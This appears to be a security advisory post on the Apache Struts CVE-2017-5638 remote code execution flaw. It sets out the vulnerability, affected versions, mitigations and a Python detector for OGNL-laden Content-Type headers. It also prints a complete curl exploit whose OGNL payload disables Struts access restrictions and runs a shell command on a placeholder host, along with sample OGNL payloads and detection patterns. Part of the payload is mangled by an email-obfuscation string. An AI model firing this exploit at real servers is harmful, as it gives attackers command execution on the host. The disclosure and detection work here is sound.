Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a file upload request carries a malformed Content-Type header, the parser builds an error message that includes the header's value, and that message is then evaluated as an Object-Graph Navigation Language (OGNL) expression without any sanitization. An attacker can therefore place an OGNL expression in the Content-Type header. Because the Struts framework evaluates this expression on the server side, the attacker achieves Remote Code Execution (RCE) with the privileges of the Struts application server. This bypasses the application's own security controls and grants direct command execution on the underlying host, simply by submitting a specially crafted HTTP request.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

Date: 2017-03-07

Prediction: Patch Available

What Undercode Says:

curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target-host/upload.action

How the exploit works:

The attacker crafts a malicious Content-Type header containing an OGNL expression.

The request is sent to a vulnerable Struts file-upload endpoint.

The OGNL expression is evaluated by the server and executes operating-system commands.

The attacker gains full control of the server.

Protection from this CVE:

Apply the Struts patch immediately.

Upgrade to version 2.3.32 or 2.5.10.1.

Implement WAF filtering rules that reject requests whose Content-Type header contains OGNL expressions rather than a valid media type.

Disable file upload functionality if it is not used.
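The WAF recommendation above can be made concrete. The following is an added example, not code from the original post or from the Apache Struts project: it checks Content-Type header values against the media-type grammar (type/subtype plus optional parameters) and additionally looks for OGNL expression markers such as `%{` or `${`, which never appear in a legitimate multipart Content-Type. The sample header values are constructed for the example; the function names are my own choices.

```python
import re

# Constructed sample Content-Type header values (not captured traffic).
SAMPLE_HEADERS = [
    "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "application/x-www-form-urlencoded",
    "%{(#_='multipart/form-data').(#cmd='id')}",                      # OGNL expression
    "${#context['xwork.MethodAccessor.denyMethodExecution']=false}",   # OGNL expression
    "multipart/form-data; boundary=%{#cmd}",                           # OGNL inside a parameter
]

# RFC 7230 token characters; a media type is token "/" token, then ;name=value parameters.
TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
VALID_CONTENT_TYPE = re.compile(
    rf'^{TOKEN}/{TOKEN}(\s*;\s*{TOKEN}=({TOKEN}|"[^"]*"))*\s*$'
)

# Markers that indicate an OGNL expression rather than a media type.
OGNL_MARKERS = re.compile(
    r"[%$]\{|#_memberAccess|@[\w.]+@|ognl\.OgnlContext", re.IGNORECASE
)


def classify_content_type(value: str) -> dict:
    """Return a verdict for one Content-Type header value.

    'allow' - the value is a syntactically valid media type
    'block' - the value is malformed and/or contains OGNL markers
    """
    reasons = []
    if OGNL_MARKERS.search(value):
        reasons.append("ognl-marker")
    if not VALID_CONTENT_TYPE.match(value):
        reasons.append("malformed-media-type")
    return {
        "value": value,
        "verdict": "block" if reasons else "allow",
        "reasons": reasons,
    }


def scan_headers(values):
    """Classify each header value; return (blocked, allowed) result lists."""
    results = [classify_content_type(v) for v in values]
    blocked = [r for r in results if r["verdict"] == "block"]
    allowed = [r for r in results if r["verdict"] == "allow"]
    return blocked, allowed


if __name__ == "__main__":
    blocked, allowed = scan_headers(SAMPLE_HEADERS)
    for r in blocked:
        print(f"BLOCK {r['reasons']}: {r['value'][:60]}")
    print(f"{len(blocked)} blocked, {len(allowed)} allowed")
```

Rejecting any Content-Type that does not parse as a media type is the more robust of the two checks, because it does not depend on recognising specific payload keywords; the marker search is there so that the log entry explains why a request was dropped. Either way this is a compensating control: the patched versions listed above stop the parser from evaluating the header value at all, and upgrading remains the actual fix.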

Impact:

Complete system compromise.

Arbitrary code execution.

Data theft and manipulation.

The server may be recruited into a botnet.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
